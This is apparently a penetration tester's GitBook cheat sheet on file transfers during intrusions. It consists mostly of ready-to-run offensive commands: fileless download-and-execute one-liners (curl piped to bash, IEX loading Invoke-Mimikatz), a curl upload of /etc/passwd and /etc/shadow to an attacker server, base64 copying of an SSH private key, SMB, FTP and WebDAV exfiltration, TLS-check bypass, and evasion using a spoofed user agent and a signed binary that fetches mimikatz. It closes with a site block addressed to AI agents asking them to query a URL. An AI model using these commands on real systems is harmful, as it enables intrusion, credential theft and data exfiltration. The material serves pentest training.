# File Transfers ## Download Operations ## Terminal String Copy & Paste ### Linux Encode Base64 {% code overflow="wrap" %} ``` cat id_rsa |base64 -w 0;echo ``` {% endcode %}
### Windows Decode & Write Base64 {% code overflow="wrap" %} ``` [IO.File]::WriteAllBytes("C:\path\to\file", [Convert]::FromBase64String("BASE 64 STRING")) ``` {% endcode %}

cmd.exe has a maximum string length of 8,191 & powershell.exe has a maximum string length 2,147,483,647 characters

## Web Downloads with Wget & cURL ### **Download a File Using wget** {% code overflow="wrap" %} ``` wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -O /tmp/LinEnum.sh ``` {% endcode %}
### **Fileless Download with wget** {% code overflow="wrap" %} ``` wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3 ``` {% endcode %}
### **Download a File Using cURL** {% code overflow="wrap" %} ``` curl -o /tmp/LinEnum.sh https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh ``` {% endcode %}
### **Fileless Download with cURL** {% code overflow="wrap" %} ``` curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash ``` {% endcode %}
## Download with Bash (/dev/tcp) ### **Connect to the Target Webserver** {% code overflow="wrap" %} ``` exec 3<>/dev/tcp/10.10.10.32/80 ``` {% endcode %}
### **HTTP GET Request** {% code overflow="wrap" %} ``` echo -e "GET /LinEnum.sh HTTP/1.1\n\n">&3 ``` {% endcode %}
### **Print the Response** {% code overflow="wrap" %} ``` cat <&3 ``` {% endcode %}
## PowerShell Web Downloads ### **DownloadFile Method** {% code overflow="wrap" %} ``` (New-Object Net.WebClient).DownloadFile('','') ``` {% endcode %}
### **DownloadString - Fileless Method** {% code overflow="wrap" %} ``` IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') ``` {% endcode %}
### **Invoke-WebRequest** {% code overflow="wrap" %} ``` Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 -OutFile PowerView.ps1 ``` {% endcode %}

You can use the aliases iwr, curl, and wget instead of the Invoke-WebRequest full name

### **Common Errors with PowerShell**

There may be cases when the Internet Explorer first-launch configuration has not been completed, which prevents the download. This can be bypassed using the parameter -UseBasicParsing

{% code overflow="wrap" %} ``` Invoke-WebRequest https:///PowerView.ps1 -UseBasicParsing | IEX ``` {% endcode %}
{% code overflow="wrap" %} ```powershell-session IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') ``` {% endcode %}

Another error in PowerShell downloads is related to the SSL/TLS secure channel if the certificate is not trusted. We can bypass that error with the following command

{% code overflow="wrap" %} ``` [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ``` {% endcode %} ## SMB Downloads ### **Create the SMB Server** {% code overflow="wrap" %} ``` sudo impacket-smbserver share -smb2support /tmp/smbshare ``` {% endcode %}
### Copy a File from the SMB Server {% code overflow="wrap" %} ``` copy \\192.168.220.133\share\nc.exe ``` {% endcode %}

New versions of Windows block unauthenticated guest access

### **Create the SMB Server with Username & Password** {% code overflow="wrap" %} ``` sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test ``` {% endcode %}
### **Mount the SMB Server with Username and Password** {% code overflow="wrap" %} ``` net use n: \\192.168.220.133\share /user:test test ``` {% endcode %}

You can also mount the SMB server if you receive an error when you use copy filename \\IP\sharename.

## FTP Downloads ### **Installing the FTP Server Python3 Module - pyftpdlib** {% code overflow="wrap" %} ``` sudo pip3 install pyftpdlib ``` {% endcode %}
### **Setting up a Python3 FTP Server** {% code overflow="wrap" %} ``` sudo python3 -m pyftpdlib --port 21 ``` {% endcode %}
### **Transfering Files from an FTP Server Using PowerShell** {% code overflow="wrap" %} ``` (New-Object Net.WebClient).DownloadFile('ftp://192.168.49.128/file.txt', 'C:\Users\Public\ftp-file.txt') ``` {% endcode %}
### **Command File for FTP Client To Download File** {% code overflow="wrap" %} ``` echo open 192.168.49.128 > ftpcommand.txt echo USER anonymous >> ftpcommand.txt echo binary >> ftpcommand.txt echo GET file.txt >> ftpcommand.txt echo bye >> ftpcommand.txt ftp -v -n -s:ftpcommand.txt ``` {% endcode %}

You may not have an interactive shell. If that's the case, we can create an FTP command file to download a file

## Upload Operations ## Terminal String Copy & Paste ### Windows Encode & Write Base64 {% code overflow="wrap" %} ``` [Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte)) ``` {% endcode %}
### Linux Decode Base64 {% code overflow="wrap" %} ``` echo Base64string | base64 -d > hosts ``` {% endcode %}
## Web Uploads with cURL {% code overflow="wrap" %} ``` curl -X POST https://192.168.49.128/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure ``` {% endcode %}
## PowerShell Web Uploads ### **Installing a Configured WebServer with Upload** {% code overflow="wrap" %} ``` pip3 install uploadserver ``` {% endcode %} ``` python3 -m uploadserver ```
### **PowerShell Script to Upload a File to Python Upload Server** {% code overflow="wrap" %} ``` IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1') ``` {% endcode %} {% code overflow="wrap" %} ``` Invoke-FileUpload -Uri http://192.168.49.128:8000/upload -File C:\Windows\System32\drivers\etc\hosts ``` {% endcode %}
### PowerShell Base64 Web Upload {% code overflow="wrap" %} ``` $b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:\Windows\System32\drivers\etc\hosts' -Encoding Byte)) ``` {% endcode %} {% code overflow="wrap" %} ``` Invoke-WebRequest -Uri http://192.168.49.128:8000/ -Method POST -Body $b64 ``` {% endcode %}
{% code overflow="wrap" %} ``` nc -lvnp 8000 ``` {% endcode %}
{% code overflow="wrap" %} ``` echo | base64 -d -w 0 > hosts ``` {% endcode %} ## SMB Uploads

Commonly enterprises don't allow the SMB protocol (TCP/445). An alternative is to run SMB over HTTP with WebDav. When you use SMB, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP

### **Installing WebDav Python modules** {% code overflow="wrap" %} ``` sudo pip3 install wsgidav cheroot ``` {% endcode %}
### **Using the WebDav Python module** {% code overflow="wrap" %} ``` sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous ``` {% endcode %}
### **Connecting to the Webdav Share** {% code overflow="wrap" %} ``` dir \\192.168.49.128\DavWWWRoot ``` {% endcode %}

DavWWWRoot is a special keyword recognized by the Windows Shell. No such folder exists on your WebDAV server. You can avoid using this keyword if you specify a folder that exists on your server when connecting to the server. For example: \192.168.49.128\sharefolder

### **Uploading Files using SMB** {% code overflow="wrap" %} ``` copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\ ``` {% endcode %} {% code overflow="wrap" %} ``` copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\sharefolder\ ``` {% endcode %}

If there are no SMB (TCP/445) restrictions, you can use impacket-smbserver the same way we set it up for download operations.

### FTP Uploads ``` sudo python3 -m pyftpdlib --port 21 --write ```

You need to specify the option --write to allow clients to upload files to our attack host

### **PowerShell Upload File** {% code overflow="wrap" %} ``` (New-Object Net.WebClient).UploadFile('ftp://192.168.49.128/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts') ``` {% endcode %}
### **Command File for FTP Client to Upload File** {% code overflow="wrap" %} ``` echo open 192.168.49.128 > ftpcommand.txt echo USER anonymous >> ftpcommand.txt echo binary >> ftpcommand.txt echo PUT c:\windows\system32\drivers\etc\hosts >> ftpcommand.txt echo bye >> ftpcommand.txt ftp -v -n -s:ftpcommand.txt ``` {% endcode %}
## **Mounting a Linux Folder With RDP** ### **Mounting Using rdesktop** {% code overflow="wrap" %} ``` rdesktop 10.10.10.132 -d HTB -u administrator -p 'Password0@' -r disk:linux='/home/user/rdesktop/files' ``` {% endcode %}
### **Mounting Using xfreerdp** {% code overflow="wrap" %} ``` xfreerdp /v:10.10.10.132 /d:HTB /u:administrator /p:'Password0@' /drive:linux,/home/plaintext/htb/academy/filetransfer ``` {% endcode %}
## Evading Detection ### **Listing out User Agents** {% code overflow="wrap" %} ``` [Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl ``` {% endcode %}
### **Request with Chrome User Agent** {% code overflow="wrap" %} ``` $UserAgent = [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome ``` {% endcode %} {% code overflow="wrap" %} ``` Invoke-WebRequest http://10.10.10.32/nc.exe -UserAgent $UserAgent -OutFile "C:\Users\Public\nc.exe" ``` {% endcode %}
### **Transferring File with GfxDownloadWrapper.exe** {% code overflow="wrap" %} ``` GfxDownloadWrapper.exe "http://10.10.10.132/mimikatz.exe" "C:\Temp\nc.exe" ``` {% endcode %}
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://thescriptkid.gitbook.io/notes/miscellaneous/file-transfers.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.